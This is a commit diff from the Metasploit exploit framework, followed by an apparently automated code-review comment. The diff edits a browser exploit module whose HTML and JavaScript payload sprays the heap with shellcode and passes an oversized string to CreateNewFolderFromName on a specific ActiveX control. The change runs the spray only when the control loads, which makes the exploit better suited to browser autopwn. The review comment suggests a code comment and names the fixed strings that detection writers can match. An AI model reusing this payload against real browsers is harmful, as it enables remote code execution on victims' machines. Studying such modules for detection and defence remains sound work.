play a little nicer with browser autopwn by not spraying the heap if creating the vulnerable object failed
git-svn-id: file:///home/svn/framework3/trunk@12667 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
3fedad5715
commit
36983436db
|
@ -92,11 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
rand6 = rand_text_alpha(rand(100) + 1)
|
rand6 = rand_text_alpha(rand(100) + 1)
|
||||||
rand7 = rand_text_alpha(rand(100) + 1)
|
rand7 = rand_text_alpha(rand(100) + 1)
|
||||||
rand8 = rand_text_alpha(rand(100) + 1)
|
rand8 = rand_text_alpha(rand(100) + 1)
|
||||||
|
boom = rand_text_alpha(rand(100) + 1)
|
||||||
|
|
||||||
content = %Q|
|
content = %Q|
|
||||||
<html>
|
<html>
|
||||||
<object id='#{vname}' classid='clsid:A09AE68F-B14D-43ED-B713-BA413F034904'></object>
|
<object id='#{vname}' classid='clsid:A09AE68F-B14D-43ED-B713-BA413F034904'></object>
|
||||||
<script language="JavaScript">
|
<script language="JavaScript">
|
||||||
|
function #{boom}() {
|
||||||
var #{rand1} = unescape('#{shellcode}');
|
var #{rand1} = unescape('#{shellcode}');
|
||||||
var #{rand2} = unescape('#{ret}');
|
var #{rand2} = unescape('#{ret}');
|
||||||
var #{rand3} = 20;
|
var #{rand3} = 20;
|
||||||
|
@ -110,6 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
var #{rand8} = "A";
|
var #{rand8} = "A";
|
||||||
for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + #{rand2} }
|
for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + #{rand2} }
|
||||||
#{vname}.CreateNewFolderFromName(#{rand8});
|
#{vname}.CreateNewFolderFromName(#{rand8});
|
||||||
|
}
|
||||||
|
if ((typeof #{vname}.CreateNewFolderFromName) != "undefined") {
|
||||||
|
#{boom}();
|
||||||
|
}
|
||||||
</script>
|
</script>
|
||||||
</html>
|
</html>
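Review bot: The new `if ((typeof #{vname}.CreateNewFolderFromName) != "undefined")` guard at the end of the script block has no comment explaining why it exists, so the reason lives only in the commit message. A Ruby comment above `content = %Q|`, such as `# Only run the routine if the control instantiated, so a failed load does not disturb other autopwn modules`, would keep that with the code. For anyone writing detections from this page: the identifiers are randomised per response, but the `classid` value and the `CreateNewFolderFromName` name in the guard are fixed literals and are the stable strings to match. The enclosing method starts above the first hunk and presumably continues below the second.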
|
||||||
|
|
|
|
||||||
|
|